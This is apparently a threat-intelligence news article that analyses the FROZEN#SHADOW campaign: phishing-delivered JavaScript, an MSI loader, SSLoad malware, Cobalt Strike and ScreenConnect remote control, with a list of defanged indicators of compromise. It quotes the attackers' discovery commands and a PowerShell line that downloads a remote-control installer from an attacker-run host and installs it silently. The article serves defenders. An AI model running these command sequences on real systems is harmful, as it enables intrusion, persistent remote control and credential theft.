A new attack campaign has been discovered to be employed by the FROZEN#SHADOW, which utilized SSLoad malware for its operations and Cobalt Strike Implants to pivot and take over the entire network.
In addition, the threat actors also used Remote Monitoring and management) software like ScreenConnect RMM for further control.
SSLoad is a well-designed malware that can stealthily infiltrate the systems, gather sensitive information, and exfiltrate the collected information back to the malware operators.
Moreover, the malware also leverages multiple backdoors and payloads to evade detection and maintain persistence.
Technical Analysis
This new attack campaign starts with a traditional phishing email containing a malicious link.
When users visit this link, it redirects them to mmtixmm[.]org URL to another download site where a JavaScript file is downloaded to the victim machine.
Is Your Network Under Attack? - Read CISO’s Guide to Avoiding the Next Breach - Download Free Guide
If this JavaScript file is manually executed, it performs several operations that will download and execute further payloads on the victim machine.
The targeting of these phishing email campaigns appears to be random, as the victims were in multiple countries, including Asia, Europe, and the Americas.
Further investigations on the malware revealed that the attack takes place in different stages as follows:
- Stage 1: Initial Execution – JavaScript
- Stage 2: MSI File Execution
- Stage 3: Malware Execution
- Stage 4: Cobalt Strike Execution
- Stage 5: RMM Software & Lateral Movement
Stage 1: Initial Execution – JavaScript
This initial stage involves the manual execution of the JavaScript file.
On analyzing the JS file out_czlrh.js, it was discovered that it consisted of 97.6% commented code with random characters to obfuscate the file.
However, removing the commented code revealed a crystal clear JS code that did not have any kind of obfuscation.
On analyzing the JS code, it was observed that the JS file performs multiple operations which starts with creating instances of ActiveXObject for WScript.Network and Scripting.FileSystemObject.
After this, the JS code, which contains “GetObject(“winmgmts:\\.\root\cimv2”),” tries to access WMI Object for simple command line operations.
In addition, the code also sets up variables to manage the number of connection attempts and gather the connection status of a network share.
Further, the script also maps all the available drives to a network share located at \wireoneinternet[.]info@80share.
The JS code also executes the “net use” command via WMI to map the network drive correctly.
After this, there is a three-second wait, after which it again runs the same command to confirm the mapping of the network drive.
Once all these steps are successfully completed, the script constructs a command to install an MSI package (slack.msi) from the mapped network drive using msiexec.exe.
Stage 2: MSI Execution
This slack.msi file is similar to the BazarBackdoor, often used by the TrickBot malware gang.
The malware was capable of filtrating networks and deploying additional payloads. However, after executing this slack.msi file, the malware communicates with multiple domains
- wireoneinternet[.]info
- skinnyjeanso[.]com
- titnovacrion[.]top
- Maramaravilha[.]com
- globalsolutionunlimitedltd[.]com
Moreover, only after this is the SSLoad malware downloaded and executed.
The payloads of the SSLoad consist of a semi-randomly named DLL file, which is located in %APPDATA%localdigistampmbae-api-na.dll.
This DLL is, however, executed by Rundll32.exe, after which the DLL copies itself to %APPDATA%Custom_update.
Stage 3: Malware Execution
In addition to the previous stage, the execution of the rundll32.exe command will also begin communication with two preconfigured C2 servers which are hxxps://skinnyjeanso[.]com/live/ and to hxxps://titnovacrion[.]top/live/. Following this, the malware begins to collect the system and user data for local host as well as the domain related information using following cmd.exe commands.
- exe /c ipconfig /all
- exe /c systeminfo
- exe /c nltest /domain_trusts
- exe /c nltest /domain_trusts /all_trusts
- exe /c net view /all /domain
- exe /c net view /all
- exe /c net group “domain admins” /domain
- exe /c wmic.exe /node:localhost /namespace:\rootsecuritycenter2 path antivirusproduct get * /format:list
- exe /c net config workstation
- exe /c wmic.exe /node:localhost /namespace:\rootsecuritycenter2 path antivirusproduct get displayname | findstr /v /b /c:displayname || echo no antivirus installed
- exe /c whoami /groups
These collected information are then sent to the C2 servers via HTTPS connections. Once the threat actors receive this information from the infected system, they begin to execute some manual commands after confirming that the information is from a legitimate server and not from a honeypot. The manual commands executed by the threat actors are as follows:
- exe -c “[console]::outputencoding = [console]::inputencoding = [system.text.encoding]::getencoding(‘utf-8’); cd c:; powershell”
- exe /groups
- exe group “domain admins” /dom
- exe /node:localhost /namespace:\rootsecuritycenter2 path antivirusproduct get * /format:list
These commands were executed to manipulate and prob the server environment for the next stage of malware activities.
Stage 4: Cobalt Strike Beacon
This stage of the malware involves deploying the Cobalt Strike beacon on the systems after executing the manual commands.
Once this beacon is deployed, it becomes the primary means of communication for the C2. However, this beacon is dropped and executed via the following rundll32.exe command.
Rundll32.exe C:ProgramDatamsedge.dll,MONSSMRpgaTQssmrpgatq
Additionally, the threat actors also used this Cobalt Strike to download and install a ScreenConnect RMM software instance on the victim system using the following commands:
- exe /c whoami /groups
- exe /c wmic /node:localhost /namespace:\rootsecuritycenter2 path antivirusproduct get * /format:list
- exe /c iwr -uri “hxxps://t0talwar.screenconnect[.]com/bin/screenconnect.clientsetup.msi?e=access&y=guest&c=&c=tjx-usa.com&c=&c=dc&c=&c=&c=&c=” -outfile c:programdatamsedgeview.msi
- exe /c systeminfo
- exe /c msiexec.exe /i C:ProgramDataMsedgeview.msi /quiet /qn
Stage 5: RMM Software And Lateral Movement
Every single compromised system is controlled with the ScreenConnect RMM Software so as to maintain complete control on the system.
However, After this, the Lateral movement takes place by harvesting the credentials and other critical system details.
The enumeration of the environment is done using multiple PowerShell commands such as Invoke-ShareFinder, Find-DomainShare, and Get-DomainFileServer PowerShell commandlets.
The credential extraction is performed through which they can also obtain a domain admin account NTLM hash.
Indicators Of Compromise
C2 Address
- 85.239.54[.]190
- 23.159.160[.]88
- 23.95.209[.]148
- 45.95.11[.]134
- bjSdg0.pintaexoticfashion.co[.]in
- l1-03.winupdate.us[.]to
- 23-95-209-148-host.colocrossing[.]com:443
- mmtixmm[.]org
- wireoneinternet[.]info
- skinnyjeanso[.]com
- titnovacrion[.]top
- simplyfitphilly[.]com
- kasnackamarch[.]info
- sokingscrosshotel[.]com
- danteshpk[.]com
- stratimasesstr[.]com
- winarkamaps[.]com
- globalsolutionunlimitedltd[.]com
- maramaravilha[.]com
- krd6[.]com
- hxxps://t0talwar.screenconnect[.]com
Furthermore, a complete list of files/hashes used for this attack campaign can be found here.
Combat Email Threats with Easy-to-Launch Phishing Simulations: Email Security Awareness Training ->
Try Free Demo